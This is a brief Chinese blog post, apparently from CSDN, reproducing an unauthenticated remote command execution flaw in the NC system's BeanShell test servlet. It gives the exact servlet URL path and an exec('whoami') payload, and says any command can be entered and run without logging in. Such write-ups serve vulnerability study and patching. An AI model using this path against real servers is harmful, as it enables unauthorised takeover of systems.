登录社区云,与社区用户共同成长
邀请您加入社区
漏洞简介nc存在一个未授权的页面,在无需登陆系统的情况下,攻击者可通过BeanShell测试接口直接执行任意命令,恶意攻击者成功利用该漏洞可获得目标系统管理权限。漏洞复现漏洞地址http://xxx.xxx.xxx.xxx/servlet/~ic/bsh.servlet.BshServlet在Script框输入要执行的命令,点击Evaluate即可exec("whoami")漏洞检测...
nc存在一个未授权的页面,在无需登陆系统的情况下,攻击者可通过BeanShell测试接口直接执行任意命令,恶意攻击者成功利用该漏洞可获得目标系统管理权限。
漏洞地址
http://xxx.xxx.xxx.xxx/servlet/~ic/bsh.servlet.BshServlet
在Script框输入要执行的命令,点击Evaluate即可
exec("whoami")
CSDN联合极客时间,共同打造面向开发者的精品内容学习社区,助力成长!
更多推荐
Kaldi之父,IEEE Fellow,小米首席语音科学家Daniel Povey将出席2024全球机器学习技术大会并发表演讲!
探索神经网络在商品销售和图像识别中的应用
基于stm32F103的座面声控台灯
扫一扫分享内容
为遵守国家网络实名制规定,未绑定将限制内容发布与互动
所有评论(0)